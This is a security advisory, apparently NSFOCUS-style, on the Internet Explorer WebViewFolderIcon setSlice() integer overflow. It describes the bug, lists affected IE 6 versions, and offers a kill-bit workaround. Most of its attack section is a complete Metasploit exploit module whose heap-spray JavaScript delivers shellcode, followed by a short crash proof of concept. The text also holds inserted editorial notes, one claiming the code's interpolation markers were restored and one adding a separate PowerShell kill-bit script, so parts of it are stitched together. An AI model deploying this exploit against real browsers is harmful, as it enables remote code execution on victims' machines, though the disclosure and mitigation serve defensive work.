Affected program:
Microsoft IE WebViewFolderIcon
Description:
Microsoft IE WebViewFolderIcon remote integer overflow vulnerability
Details:
Internet Explorer is a very popular web browser released by Microsoft.
Internet Explorer contains an integer overflow in its handling of a malformed ActiveX object method call; a remote attacker could exploit this vulnerability to crash the browser or execute arbitrary code.
If an attacker can pass the value 0x7fffffff to the setSlice method of the WebViewFolderIcon control, the browser may crash or execute arbitrary code.
<* Source: H D Moore (hdm@metasploit.com)
   Links: http://browserfun.blogspot.com/
          http://www.kb.cert.org/vuls/id/753044
          http://www.us-cert.gov/cas/techalerts/TA06-270A.html
*>
Affected systems:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Attack method:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!
require 'msf/core'

module Msf

class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote

  include Exploit::Remote::HttpServer::Html

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
      'Description'    => %q{
        This module exploits a flaw in the WebViewFolderIcon ActiveX control
        included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
        during the Month of Browser Bugs project (MoBB #18).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'hdm',
        ],
      'Version'        => '$Revision: 3783 $',
      'References'     =>
        [
          [ 'OSVDB', '27110' ],
          [ 'BID', '19030' ],
          [ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
        ],
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
        ],
      'DefaultTarget'  => 0))
  end

  def autofilter
    false
  end

  def on_request_uri(cli, request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    # Encode the shellcode
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Get a unicode friendly version of the return address
    addr_word = [target.ret].pack('V').unpack('H*')[0][0,4]

    # Randomize the javascript variable names
    var_buffer    = Rex::Text.rand_text_alpha(rand(30)+2)
    var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
    var_unescape  = Rex::Text.rand_text_alpha(rand(30)+2)
    var_x         = Rex::Text.rand_text_alpha(rand(30)+2)
    var_i         = Rex::Text.rand_text_alpha(rand(30)+2)
    var_tic       = Rex::Text.rand_text_alpha(rand(30)+2)
    var_toc       = Rex::Text.rand_text_alpha(rand(30)+2)

    # Randomize HTML data
    html = Rex::Text.rand_text_alpha(rand(30)+2)

    # Build out the message.
    # Note: the #{...} interpolation markers in this template were lost when the
    # page was extracted (only a bare '#' survived); they are restored here from
    # the variable names declared above.
    content = %Q|
<html>
<head>
<script>
try {
  var #{var_unescape} = unescape ;
  var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
  var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
  while (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ;
  var #{var_x} = new Array() ;
  for ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) {
    #{var_x}[ #{var_i} ] =
      #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +
      #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +
      #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +
      #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
  }
  for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) {
    var #{var_tic} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );
    try { #{var_tic}.setSlice( 0x7ffffffe , 0 , 0 , #{var_x} ) ; } catch( e ) { }
    var #{var_toc} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );
  }
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
<body>
#{html}
</body>
</html>
|

    # Randomize the whitespace in the document
    content.gsub!(/\s+/) do |s|
      len = rand(100)+2
      set = "\x09\x20\x0d\x0a"
      buf = ''
      while (buf.length < len)
        buf << set[rand(set.length)].chr
      end
      buf
    end

    print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

    # Transmit the response to the client
    send_response(cli, content)
  end

end
end
===============================================
var a = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
a.setSlice(0x7fffffff, 0, 0x41424344, 0);
Solution:
Temporary workaround:
If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:
* Disable the WebViewFolderIcon ActiveX control
Set the kill bit for the following CLSID to disable the WebViewFolderIcon control:
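As an added example that is not part of the advisory or of NSFOCUS's own guidance, the following PowerShell applies the kill bit for a CLSID and then reads it back to confirm it took effect. It assumes the standard kill-bit mechanism documented in Microsoft KB 240797: a DWORD value named "Compatibility Flags" with bit 0x400 set under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID} (and the Wow6432Node view for 32-bit IE on 64-bit Windows). The CLSID in the script is a placeholder, since the advisory does not reproduce it; the functions Set-ActiveXKillBit and Test-ActiveXKillBit are names chosen for this example.

```powershell
# Added example (not from the advisory): set and verify the ActiveX "kill bit" for a CLSID.
# Mechanism (Microsoft KB 240797): a DWORD "Compatibility Flags" with bit 0x400 set under
#   HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}
# makes Internet Explorer refuse to instantiate the control.
# On 64-bit Windows the 32-bit IE reads the Wow6432Node view, so both views are handled.
# The CLSID used at the bottom is a PLACEHOLDER; substitute the CLSID from the vendor advisory.

$KillBit = 0x400

function Get-ActiveXCompatPaths {
    # Registry keys where the kill bit must be present for this CLSID.
    param([Parameter(Mandatory)][string]$Clsid)
    $paths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")
    if ([Environment]::Is64BitOperatingSystem) {
        $paths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    }
    return $paths
}

function Test-ActiveXKillBit {
    # Returns $true only if the kill bit is set in every applicable registry view.
    param([Parameter(Mandatory)][string]$Clsid)
    foreach ($key in Get-ActiveXCompatPaths -Clsid $Clsid) {
        if (-not (Test-Path -LiteralPath $key)) { return $false }
        $flags = (Get-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $flags -or (($flags -band $KillBit) -eq 0)) { return $false }
    }
    return $true
}

function Set-ActiveXKillBit {
    # Requires an elevated shell (writes under HKLM). Preserves any flags already present
    # by OR-ing the kill bit in rather than overwriting the value.
    param([Parameter(Mandatory)][string]$Clsid)
    foreach ($key in Get-ActiveXCompatPaths -Clsid $Clsid) {
        if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
        $current = (Get-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $current) { $current = 0 }
        Set-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -Value ($current -bor $KillBit) -Type DWord
    }
    return (Test-ActiveXKillBit -Clsid $Clsid)
}

# Usage with a placeholder CLSID; replace it with the real one from the advisory.
$Clsid = '{00000000-0000-0000-0000-000000000000}'
if (Set-ActiveXKillBit -Clsid $Clsid) {
    Write-Output "Kill bit set and verified for $Clsid"
} else {
    Write-Output "Kill bit NOT confirmed for $Clsid (is the shell elevated?)"
}
```

Setting the kill bit blocks the control in Internet Explorer only; it does not remove the DLL, so the same CLSID can still be instantiated by other COM hosts. Verify with Test-ActiveXKillBit after any IE or Windows servicing, since an update that re-registers the control can leave the flag in place but is worth confirming.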
Vendor patch:
Microsoft
---------
The vendor has not yet released a patch or upgrade; we recommend that users of this software check the vendor's home page regularly for the latest version:
http://www.microsoft.com/windows/ie/default.asp